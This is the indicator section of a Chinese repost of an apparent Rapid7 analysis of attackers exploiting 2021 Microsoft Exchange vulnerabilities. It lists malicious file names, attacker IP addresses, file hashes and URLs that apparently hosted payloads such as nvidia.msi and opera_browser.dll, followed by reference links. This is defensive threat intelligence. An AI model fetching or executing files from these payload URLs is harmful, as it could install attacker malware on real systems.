opera_browser.exe

Filename

opera_browser.png

Filename

OutlookEN.aspx

Filename

MonitoringLog.cmd

Filename

MonitoringLog.exe

Filename

p

Filename

procdump64.exe

Filename

Service.Information.rtf

Filename

TimeoutLogout.aspx

Filename

2.bat

Filename

script1.ps1

Filename

test.bat

IP Address

178.162.217.107

IP Address

178.162.203.202

IP Address

178.162.203.226

IP Address

85.17.31.122

IP Address

5.79.71.205

IP Address

5.79.71.225

IP Address

178.162.203.211

IP Address

85.17.31.82

IP Address

86.105.18.116

IP Address

198.98.61.152

IP Address

89.34.111.11

MD5

7a6c605af4b85954f62f35d648d532bf

MD5

e1ae154461096adb5ec602faad42b72e

MD5

b3df7f5a9e36f01d0eb0043b698a6c06

MD5

c60ac6a6e6e582ab0ecb1fdbd607705b

MD5

42badc1d2f03a8b1e4875740d3d49336

MD5

c515107d75563890020e915f54f3e036

SHA1

02886f9daa13f7d9855855048c54f1d6b1231b0a

SHA1

c7f68a184df65e72c59403fb135924334f8c0ebd

SHA1

ab32d4ec424b7cd30c7ace1dad859df1a65aa50e

SHA1

ba9de479beb82fd97bbdfbc04ef22e08224724ba

SHA1

cee178da1fb05f99af7a3547093122893bd1eb46

SHA1

2fed891610b9a770e396ced4ef3b0b6c55177305

SHA-256

b212655aeb4700f247070ba5ca6d9c742793f108881d07e4d1cdc4ede175fcff

SHA-256

d740136b37f894d76a7d4dedbe1ae51ed680c964bcb61e7c4ffe7d0e8b20ea09

SHA-256

bd79027605c0856e7252ed84f1b4f934863b400081c449f9711446ed0bb969e6

SHA-256

4d24b359176389301c14a92607b5c26b8490c41e7e3a2abbc87510d1376f4a87

SHA-256

c136b1467d669a725478a6110ebaaab3cb88a3d389dfa688e06173c066b76fcf

SHA-256

076d3ec587fc14d1ff76d4ca792274d1e684e0f09018b33da04fb1d5947a7d26

URL

http://103.212.223.210:9900/nvidia.msi

URL

http://86.105.18.116/news/code

URL

http://86.105.18.116/news/opera_browser.dll

URL

http://86.105.18.116/news/opera_browser.exe

URL

http://86.105.18.116/news/opera_browser.png

URL

http://89.34.111.11/3.avi

URL

http://microsoftsoftwaredownload.com:8080/c103w-at.zip

URL

http://microsoftsoftwaredownload.com:8080/m103w.zip

URL

http://p.estonine.com/p?e

URL

http://<REDACTED_HOSTNAME>/owa/auth/ /zfwqn

URL

http://<REDACTED_HOSTNAME>/owa/auth/%20/zfwqn


参考链接

  • https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/

  • https://aka.ms/ExchangeVulns

  • https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/

  • https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html

  • https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html

  • https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-china-chopper.pdf

本文始发于微信公众号(Rapid7):微软Exchange漏洞攻击者行为分析

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年3月26日08:13:29
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   微软Exchange漏洞攻击者行为分析http://cn-sec.com/archives/300730.html

发表评论

匿名网友 填写信息